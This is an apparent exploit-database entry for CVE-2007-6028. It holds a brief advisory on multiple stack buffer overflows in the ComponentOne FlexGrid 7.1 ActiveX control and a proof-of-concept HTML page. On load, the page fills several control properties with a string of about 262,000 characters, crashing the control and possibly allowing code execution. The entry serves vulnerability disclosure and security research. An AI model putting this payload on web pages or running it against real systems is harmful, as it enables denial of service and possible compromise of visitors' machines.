ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities

Author: Elazar Broad
type: remote
platform: windows
port: 
date_added: 2007-11-15 
date_updated: 2014-01-07 
verified: 1 
codes: CVE-2007-6028;OSVDB-41939 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/26467/info

ComponentOne FlexGrid ActiveX Control is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to adequately check boundaries on user-supplied input.

An attacker can exploit these issues to cause denial denial-of-service conditions and possibly to execute arbitrary code, but this has not been confirmed.

ComponentOne FlexGrid 7.1 Light is vulnerable; other versions may also be affected.

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";

     while (s.length < 262145) s=s+s;

     var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");

     obj.Text = s;
     obj.EditSelText = s;
     obj.EditText = s;
     obj.CellFontName = s;
   }
  </script>

 </head>
 <body onload="JavaScript: return Check();" />
</html>